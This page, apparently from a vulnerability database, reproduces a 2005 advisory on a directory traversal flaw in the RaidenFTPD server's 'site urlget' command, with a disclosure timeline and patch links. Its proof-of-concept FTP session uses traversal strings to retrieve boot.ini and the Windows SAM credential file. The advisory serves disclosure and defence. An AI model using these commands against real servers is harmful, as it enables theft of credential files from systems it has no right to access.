Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

raidenftpdTraverse.txt

πŸ—“οΈΒ 02 Jul 2005Β 00:00:00Reported byΒ Lachlan. HTypeΒ 
packetstorm
Β packetstormπŸ”—Β packetstormsecurity.comπŸ‘Β 17Β Views

RaidenFTPD version < 2.4.2241 Directory Traversal security issu

Code
`Product : RaidenFTPD   
  
Affected Versions : < 2.4.2241  
  
***  
  
Author: Lachlan. H  
  
Date vendor notified: 19/04/2005  
  
Patch released: 20/04/2005  
  
Disclosure: 02/05/2005  
  
  
***  
  
Product Description:  
  
RaidenFTPD is an easy-to-use ftp server software for  
WindowsΒ™. With this handy tool you can share your  
files with friends, provide file download services to  
customers or even setup your own private network file  
server. Not only are all the basic FTP server features  
built-in; it also features various advanced features  
such as SSL/TLS, UTF8, UPnP NAT traversal and more ..  
  
***  
  
Problem:   
  
Directory Traversal - Failure to validate input for  
the site command 'urlget'.   
  
Using urlget it's possible for a normal user to escape  
ftproot and download known files from restricted  
directories.  
  
The JohnLong Team acted promptly to resolve the issue.  
  
***  
  
Fix:  
  
http://www.raidenftpd.com/en/  
  
FULL :  
http://www.raidenmaild.com/download/raidenftpd2.exe  
UPDATE :  
http://www.raidenmaild.com/download/update.exe  
  
***  
  
PoC:  
  
230 User ****** logged in.  
ftp> quote site urlget file://\..\\boot.ini  
550 site urlget failed : hacking attempt , you have  
been logged.  
ftp> quote site urlget file:/..\\boot.ini  
220 site urlget : downloading  
file:/..\\boot.ini->boot.ini  
ftp> ls  
200 Port command ok.  
150 Opening ASCII data connection for ls /.  
boot.ini  
226-free disk space under this directory : 28919 mb  
226 Transfer finished successfully.   
Data connection closed .  
ftp: 10 bytes received in 0.00 Seconds  
10000.00Kbytes/sec.  
ftp> quote site urlget file:/..\\winnt/repair/sam  
220 site urlget : downloading  
file:/..\\winnt/repair/sam->sam  
ftp> ls  
200 Port command ok.  
150 Opening ASCII data connection for ls /.  
boot.ini  
sam  
226-free disk space under this directory : 28919mb  
226 Transfer finished successfully.   
Data connection closed .  
ftp: 15 bytes received in 0.00Seconds  
15000.00Kbytes/sec.  
ftp>  
  
***  
  
  
__________________________________________________  
Do You Yahoo!?  
Tired of spam? Yahoo! Mail has the best spam protection around   
http://mail.yahoo.com   
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 Jul 2005 00:00Current
7.4High risk
Vulners AI Score7.4
raidenftpddirectory traversalwindowsftp serversecurity issuepatchurlgetfile download
17
.json
Report